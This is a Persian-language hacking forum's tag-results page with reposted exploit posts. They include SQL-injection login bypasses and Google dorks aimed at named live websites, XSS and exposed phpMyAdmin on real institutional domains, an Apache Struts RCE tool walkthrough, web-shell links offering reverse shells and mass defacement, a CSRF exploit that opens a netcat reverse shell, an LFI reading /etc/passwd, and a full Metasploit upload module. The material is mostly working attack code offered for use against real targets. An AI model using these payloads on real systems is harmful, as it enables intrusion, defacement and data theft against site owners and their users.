iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking-Penetration testing to the site'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

355 نتیجه پیدا شد

  1. دوره آموزشی اکسپلویت نویسی مقدماتی از فرانش مدرس : بهروز منصوری سایت : https://faranesh.com/network-security/15521-preliminary-exploit دانلود رایگان : http://s9.picofile.com/file/8351923392/1_معرفی_دوره.mp4.html http://s9.picofile.com/file/8351924742/2_آشنایی_با_اصطلاحات_و_دورک_نویسی.mp4.html http://s9.picofile.com/file/8351928484/3_نحوه_نوشتن_استاندارد_یک_اکسپلویت.mp4.html http://s8.picofile.com/file/8351931284/4_ثبت_یک_اکسپلویت_به_صورت_آنلاین.mp4.html
  2. باسلام خدمت تمامی کاربران عزیز در این بخش تارگت ها و شل های تمرینی که توسط اساتید تیم اپلود و اماده سازی شده قرار داده میشود برای تمرین شما هنرجویان عزیز لطفا از پرسش و پاسخ در این تاپیک جداا خودداری فرمایید و اسپم هم نکنید موفق باشید
  3. Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/CS0077/main.asp?key=[sqli] https://www.exploit-db.com/exploits/36065/
  4. Hack server with apache struts exploit Description After a while, we again saw a new and sensitive bug for Apache Struts A new vulnerability has been discovered for the Apache-Struts service, which is rce type (Remote File Include) This security hole is in versions 2, 3 to 2, 3, 34 | There are 2.5-5.2.5.16 And to update the server security, be sure to update it to the latest version This vulnerability can be used in a variety of ways, but in this tutorial, we introduce two tools that are easy to use. Hacking the server training using the first method Be careful at first. In the system you want to test the exploit, install Python 2 or 3, because the tool is written in Python. Download the tool from the download section at the bottom of the page. To download as a folder in your Linux, use the following command git clone link Then enter the downloaded folder with the following command, which is the main tool cd struts-pwn_CVE-2018-11776 To check the site that is vulnerable to this vulnerability, enter the address below as shown below python3 struts-pwn.py -url https://site.com/struts2-showcase/index.action If you want to check multiple websites at the same time, save them in a file and submit your file to the program as a list to be saved. python3 struts-pwn.py -list list-site.txt Use the following command to use this vulnerability: python3 struts-pwn.py -exploit -url 'https://site.com/struts2-showcase/index.action' -c id Server penetration testing through APAC Secondary Hacking Method Secondary Hacking Tool Another tool we introduce to use vulnerabilities with the following identifiers CVE-2013-2251 CVE-2017-5638 CVE-2018-11776 Hack iphone and ways to deal First download the tool from the download section git clone link Then enter the downloaded folder cd Apache-Struts-v3 Now run the tool with the following command python ApacheStruts.py Apache struts vulnerability tool After the tool is executed, it does not need to be used as a switch, and each option you want to use is in the toolbar The tool that was executed will enter the link of the site you want and run exploit if there is a vulnerability. You will have full access to the remote control and you can execute your commands on the site server Conclusion The second tool introduced is a relatively simpler way to hack the server, but the second tool gives you more options. Your choice depends on your type of work and to ensure security against this security hole, be sure to update all installed server packages. Download tools The first tool https://github.com/mazen160/struts-pwn_CVE-2018-11776.git Second tool https://github.com/s1kr10s/Apache-Struts-v3.git http://www.exploit4arab.org/exploits/2206
  5. **************************************************************** ################################################################ |--------------------------------------------------------------| |[+] Exploit Title:Powered by : Best Webmasterz admin Bypass Vulnerability |[+] Date: 29/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage :srividyamandirapm.com |[+] ME:Inj3ctor@gmx.us |[+] dork: intext:"Powered by : Best Webmasterz." |--------------------------------------------------------------| ################################################################ |[+] Exploit : |[+] all sites user and pass |[+] Username: '=''or' |[+] Password: '=''or' |[+] |[+] Admin Url :- http://www.website/admin |[+]http://srividyamandirapm.com/admin |[+]http://kongunaduroadlines.com/admin |[+]http://www.goodshepherdcbe.org/admin |--------------------------------------------------------------| # >>> Discovered By :Rednofozi RHG Digital Security Team |==================================================================================== http://www.exploit4arab.org/exploits/2201
  6. |--------------------------------------------------------------| |[+] Exploit Title: inPower 2.01 © 2010, In10sity Interactive admin Bypass Vulnerability |[+] Date: 29/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage :http://highpointregional.com |[+] ME:Inj3ctor@gmx.us |[+] dork: intext:inPower 2.01 © 2010, In10sity Interactive inurl:/admin/Login.aspx |--------------------------------------------------------------| ################################################################ |[+] Exploit : |[+] all sites user and pass |[+] Username: '=''or' |[+] Password: '=''or' |[+] |[+] Admin Url :- :/admin/Login.aspx |[+]http://highpointregional.com/Admin/Login.aspx |[+]http://www.russellvillehospital.com/Admin/Login.aspx |[+]http://www.myuea.org/Admin/Login.aspx |--------------------------------------------------------------| # >>> Discovered By :Rednofozi RHG Digital Security Team |==================================================================================== http://www.exploit4arab.org/exploits/2200
  7. |--------------------------------------------------------------| |[+] Exploit Title:show book XSS Vulnerability |[+] Date:27/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:http://www.lib.ubu.ac.th |[+] dork: allinurl:/show-book.php?ID= |[+] ME:Rednofozi@hotmail.com |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Inj3ct0r |[+] Vulnerability Type :XSS Vulnerability |[+] Severity Level :Med. |[+] Exploit :info--------------> XSS Vulnerability ***************************************************************| [+]Google Search allinurl:/show-book.php?ID= [+]The End , Enjoy Of Hacking ...! <script>alert("rednofozi")</script> ***************************************************************| |--------------------------------------------------------------| XSS Vulnerability http://www.lib.ubu.ac.th/rarebook/show-book.php?id=132 **************************************************************** Discovered by : Inj3ct0r |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r http://www.exploit4arab.org/exploits/2199
  8. |[+] Exploit Title:phpMyAdmin tbl_properties_structure Vulnerability |[+] Date:27/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:ftp.nchu.edu.tw/ |[+] dork: allinurl:/tbl_properties_structure.php? |[+] ME:Rednofozi@hotmail.com |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Inj3ct0r |[+] Vulnerability Type :database Vulnerability |[+] Severity Level :Med. |[+] Exploit :info--------------> database Vulnerability ***************************************************************| [+]Google Search allinurl:/tbl_properties_structure.php? [+]The End , Enjoy Of Hacking ...! ***************************************************************| |--------------------------------------------------------------| database Vulnerability http://www.lfh.edu.hk/school_2012/teacher/backup/phpmyadmin264/tbl_properties_structure.php https://www.scsi.tn/migrated/62/68351.1/www.clubsombati-tn.org/my/sql.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&db=sombatidb&table=elx_newsfeeds&sql_query=SELECT+%2A+FROM+%60elx_newsfeeds%60&pos=0&goto=tbl_properties_structure.php **************************************************************** Discovered by : Inj3ct0r |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r http://www.exploit4arab.org/exploits/2198
  9. |--------------------------------------------------------------| |--------------------------------------------------------------| |[+] Exploit Title:phpMyAdmin database login no privileges Create new database Vulnerability |[+] Date:27/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:https://odishavigilance.gov.in |[+] dork: intext:"welcome to phpmyadmin" -login -"no privileges" "Create new database [Documentation]" inurl:phpmyadmin |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Inj3ct0r |[+] Vulnerability Type :Create new database Vulnerability |[+] Severity Level :Med. |[+] Exploit :info-------------->Create new database Vulnerability ***************************************************************| [+]Google Search intext:"welcome to phpmyadmin" -login -"no privileges" "Create new database [Documentation]" inurl:phpmyadmin [+]The End , Enjoy Of Hacking ...! ***************************************************************| |--------------------------------------------------------------| Create new database Vulnerability http://mensa.mymevis.org/phpmyadmin/ **************************************************************** Discovered by : Inj3ct0r |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r http://www.exploit4arab.org/exploits/2197
  10. Victory

    Hacking-Penetration testing to the site

    Features Explore Shell Command Eval SQL Manager DB Dumping Netsploit Upload Mailer Tools ( reverse shell - metasploit ) Symlink Domain Viewer Config Killer Bypass Jumping Server Mass Deface Hash Cpanel BruteForce https://github.com/linuxsec/shu-shell
  11. Victory

    Hacking-Penetration testing to the site

    https://github.com/flozz/p0wny-shell
  12. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  13. <!-- About: =========== Component: Plainview Activity Monitor (Wordpress plugin) Vulnerable version: 20161228 and possibly prior Fixed version: 20180826 CVE-ID: CVE-2018-15877 CWE-ID: CWE-78 Author: - LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre) Timeline: =========== - 2018/08/25: Vulnerability found - 2018/08/25: CVE-ID request - 2018/08/26: Reported to developer - 2018/08/26: Fixed version - 2018/08/26: Advisory published on GitHub - 2018/08/26: Advisory sent to bugtraq mailing list Description: =========== Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on underlying system. Application passes unsafe user supplied data to ip parameter into activities_overview.php. Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS. Combined, these three vulnerabilities can lead to Remote Command Execution just with an admin click on a malicious link. References: =========== https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/ PoC: --> <html> <!-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /> <input type="hidden" name="lookup" value="Lookup" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  14. # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting # Google Dork: inurl:"/wp-content/plugins/jibu-pro" # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip # Version: 1.7 # Tested on: Kali Linux # CVE: N/A # Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Login as a user who have access to Jibu Pro plugin. # 2) Jibu-Pro --> Create Quiz. # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number]) # 4) Click Create New Questions, fill the fields and click Save. # 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 512 name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  15. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: title # 1) Login as a user who have access to Jibu Pro plugin. # 2) Quizlord --> Add a Quiz. # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"]) # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-admin/admin.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 188 action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  16. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  17. # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion # Author: Manuel Garcia Cardenas # Date: 2018-09-19 # Software link: https://es.wordpress.org/plugins/localize-my-post/ # CVE: 2018-16299 # DESCRIPTION # This bug was found in the file: /localize-my-post/ajax/include.php # include($_REQUEST['file']); # The parameter "file" it is not sanitized allowing include local files # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. # Local File Inclusion POC: GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
  18. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arash Khazaei', # EDB PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'EDB', '37998' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Responsive Thumbnail Slider Plugin v1.0', { } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 28 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]), OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ]) ]) end def check # The version regex found in extract_and_check_version does not work for this plugin's # readme.txt, so we build a custom one. check_code = check_version || check_plugin_path if check_code return check_code else return CheckCode::Safe end end def check_version plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.body && res.body =~ /Version:([\d\.]+)/ version = Gem::Version.new($1) if version <= Gem::Version.new('1.0') vprint_status("Plugin version found: #{version}") return CheckCode::Appears end end nil end def check_plugin_path plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.code == 200 vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected') return CheckCode::Detected end nil end def login auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD']) return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies) print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}") auth_cookies end def upload_payload(cookies) manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management' file_payload = get_write_exec_payload(:unlink_self => true) file_name = "#{rand_text_alpha(5)}.php" # attempt to access plugins page plugin_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies ) unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page") end data = Rex::MIME::Message.new data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"") data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"") data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"") post_data = data.to_s # upload the file upload_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies) fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/) retrieve_file(page, cookies) end def retrieve_file(res, cookies) fname = res.body.scan(/slider\/(.*\.php)/).flatten[0] fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil? file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") print_good("Successful upload") send_request_cgi( 'uri' => file_uri, 'method' => 'GET', 'cookie' => cookies ) end def exploit unless check == CheckCode::Safe auth_cookies = login upload_payload(auth_cookies) end end end
  19. # Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-24 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html # Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/user/chatroom.php?id=[SQL] # # [PATH]/user/chatroom.php # 03 <?php # 04 $id=$_REQUEST['id']; # 05 # 06 $chatq=mysqli_query($conn,"select * from chatroom where chatroomid='$id'"); # 07 $chatrow=mysqli_fetch_array($chatq); GET /[PATH]/user/chatroom.php?id=-3%27雷�穑ɏ볯纵듧纹럫庞%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+ HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml왩,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6 Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 24 Oct 2018 20:44:14 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
